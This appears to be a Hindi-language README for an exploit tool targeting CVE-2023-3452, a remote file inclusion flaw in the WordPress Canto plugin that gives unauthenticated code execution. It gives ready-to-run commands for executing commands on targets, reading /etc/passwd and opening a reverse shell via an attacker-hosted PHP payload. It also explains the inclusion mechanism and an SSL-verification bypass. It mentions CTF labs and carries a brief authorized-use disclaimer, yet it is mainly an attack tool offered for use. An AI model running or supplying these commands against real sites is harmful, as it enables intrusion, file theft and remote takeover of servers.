
WordPress Canto प्लगइन के लिए CVE-2023-3452 शोषण, RCE, HTTPS समर्थन शामिल
वर्डप्रेस कैंटो प्लगइन (≤ 3.0.4) RFI कमजोरी के लिए शोषण। वास्तव में HTTPS पर काम करता है — अन्य सार्वजनिक PoCs ने SSL पर हार मान ली थी।
जहां श्रेय देना उचित है: यह CVE दूसरों द्वारा पाया गया। मैंने सिर्फ एक संस्करण बनाया जो HTTPS लक्ष्यों पर काम करता है।
| CVE | CVE-2023-3452 |
| EDB-ID | 51826 |
| प्रकार | रिमोट फ़ाइल समावेशन (RFI) → अप्रमाणित RCE |
| प्रभावित | वर्डप्रेस कैंटो प्लगइन < 3.0.5 (≤ 3.0.4) |
| द्वारा खुलासा | Leopoldo Angulo (leoanggal1) — 2024-02-27 |
| स्थान | /wp-content/plugins/canto/includes/lib/download.php |
| वेक्टर | wp_abspath का उपयोग बिना किसी सत्यापन के PHP फ़ाइलों को शामिल करने के लिए किया जाता है — हम अपनी फ़ाइल को दूरस्थ रूप से शामिल करते हैं। |
इस CVE के अधिकांश शोषण HTTPS पर SSL सत्यापन के कारण विफल हो जाते हैं। यह स्क्रिप्ट:
verify=False का उपयोग करता हैrequestspip install -r requirements.txt
या बस: pip install requests
python3 canto_exploit.py -t <TARGET_URL> -l <LHOST> -p <LPORT> [OPTIONS]
* कोई आदेश नहीं = स्वस्थता जांच के रूप में id; whoami; hostname चलाता है
एकल आदेश:
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "id"
फ़ाइल पढ़ना:
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "cat /etc/passwd"
रिवर्स शेल (पहले nc -lvnp 4444 चलाएँ):
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 --revshell --shell-port 4444
इंटरैक्टिव मोड:
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -i
HTTPS CTF लक्ष्य:
python3 canto_exploit.py -t https://10.129.1.136 -l 10.10.14.33 -p 8888 -c "id"
/wp-content/plugins/canto/readme.txt पर हिट करता है, संस्करण पार्स करता है (≤ 3.0.4 = कमजोर)wp-admin/admin.php लिखता है जो system() के माध्यम से आपका आदेश चलाता हैdownload.php को wp_abspath=http://LHOST:LPORT के साथ अनुरोध करता है ताकि यह हमारे रिमोट PHP को शामिल करेLHOST:LPORT पर आपकी मशीन तक पहुंचने में सक्षम होना चाहिए (HTB/लैब के लिए, यह आपका VPN IP है)-p) पर इनबाउंड की अनुमति देनी होगीकेवल अधिकृत परीक्षण और शिक्षा। केवल उन सिस्टम को छुएं जिनकी आपको अनुमति है। बाकी सब कुछ अवैध है।
MIT
| विकल्प | विवरण | आवश्यक |
|---|
-t, --target | लक्ष्य वर्डप्रेस URL (HTTP या HTTPS) | हाँ |
-l, --lhost | आपका IP — पेलोड के लिए लक्ष्य को इस तक पहुंचना होगा | हाँ |
-p, --lport | पेलोड सर्वर पोर्ट (डिफ़ॉल्ट: 8888) | नहीं |
-c, --command | लक्ष्य पर चलाने का आदेश | नहीं* |
--revshell | रिवर्स शेल उत्पन्न करें | नहीं |
--shell-port | रिवर्स शेल के लिए श्रोता पोर्ट (डिफ़ॉल्ट: 4444) | नहीं |
-i, --interactive | इंटरैक्टिव शेल मोड | नहीं |
-v, --verbose | अतिरिक्त आउटपुट | नहीं |
--skip-check | कमजोरी जांच छोड़ें | नहीं |